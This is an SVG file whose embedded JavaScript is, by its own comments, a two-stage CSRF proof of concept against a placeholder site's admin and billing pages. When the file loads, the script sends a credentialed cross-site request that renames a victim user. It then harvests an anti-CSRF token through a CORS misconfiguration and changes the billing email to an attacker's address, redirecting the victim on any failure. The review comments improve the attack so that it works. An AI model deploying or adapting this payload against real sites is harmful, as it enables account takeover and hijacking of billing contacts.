<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="100%" height="100%" viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">
// <![CDATA[
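// Stage 1 of the CSRF PoC: fire a credentialed cross-site POST to the admin
// endpoint with no anti-CSRF token in the body. Every header set here
// (Accept, Content-type: application/x-www-form-urlencoded, Accept-Language)
// is CORS-safelisted, so the browser sends the request without a preflight.
// The response is never read, so this step does not depend on the target
// emitting any CORS headers.
// NOTE(review): this only lands if the victim's session cookie is attached to
// a cross-site POST, i.e. the cookie is not SameSite=Lax/Strict -- confirm on
// the target before relying on it.
function submitRequest() {
  var x = new XMLHttpRequest();
  // Synchronous XHR (third argument false) is deprecated but still delivers.
  x.open("POST", "https://www.example.com/Admin/Users/OwnerDetails.aspx?merchantId=[victim merchantId]&sid=[victim sid]", false);
  x.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9");
  x.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  x.setRequestHeader("Accept-Language", "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7");
  // The original assigned the string "true"; it is truthy and coerces, but the
  // property is a boolean and the intent (send cookies) should be unambiguous.
  x.withCredentials = true;
  var body = "usernameTextBox=victim&main%24saveButton=Save";
  // Wrap the body bytes in a Blob, presumably so the browser sends them
  // byte-for-byte; the Content-type header above is what the server parses.
  var eBody = new Uint8Array(body.length);
  for (var i = 0; i < eBody.length; i++) {
    eBody[i] = body.charCodeAt(i);
  }
  x.send(new Blob([eBody]));
}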
// Kick off stage 1 as soon as the SVG's script runs; on any exception, bounce
// the victim to the site's front page so nothing visibly breaks.
try {
  submitRequest();
} catch (err) {
  location.href = "https://www.example.com";
}
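// Stage 2 of the PoC: fetch the billing page to harvest its
// RequestVerificationToken, then replay that token in a POST that changes the
// billing e-mail address.
// NOTE(review): reading req.responseText cross-origin only works if the target
// answers with Access-Control-Allow-Origin for the attacker's origin AND
// Access-Control-Allow-Credentials: true (a CORS misconfiguration). Otherwise
// responseText is empty, the token lookup fails, and the caller's catch fires.
// Fix applied here: the original sent neither request with credentials, so
// even a misconfigured target would have served the anonymous page (no
// victim token) and the POST would have been unauthenticated.
function email() {
  var req = new XMLHttpRequest();
  req.open('GET', 'https://www.example.com/account/BillInfo.asp?sid=[victim sid]', false);
  // Fetch the page as the victim, not anonymously.
  req.withCredentials = true;
  req.send();
  var response = req.responseText;
  var parser = new DOMParser();
  var doc = parser.parseFromString(response, "text/html");
  var tokenFields = doc.getElementsByName("RequestVerificationToken");
  if (!tokenFields.length) {
    // Fail with a readable message instead of a TypeError on undefined.
    throw new Error("RequestVerificationToken not found (CORS blocked the read or the field name differs)");
  }
  var token = tokenFields[0].value;
  var x = new XMLHttpRequest();
  x.open("POST", "https://www.example.com/account/BillInfo.asp?sid=[victim sid]", false);
  x.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9");
  x.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  x.setRequestHeader("Accept-Language", "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7");
  // The POST must carry the victim's session cookie too, or the token is useless.
  x.withCredentials = true;
  // NOTE(review): the two e-mail values differ ("attcker" vs "attacker"), most
  // likely a typo in the original; kept verbatim -- confirm which is intended.
  var body = "Billingemail=attcker%40gmail.com&originalBillingemail=attacker%40gmail.com&RequestVerificationToken=" + encodeURIComponent(token) + "&Submit=Save&cmd=submit";
  x.send(body);
}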
// Run stage 2 immediately after stage 1; any failure (e.g. the cross-origin
// token read being blocked) redirects the victim to the site's front page.
try {
  email();
} catch (err) {
  location.href = "https://www.example.com";
}
// ]]>
</script>
</svg>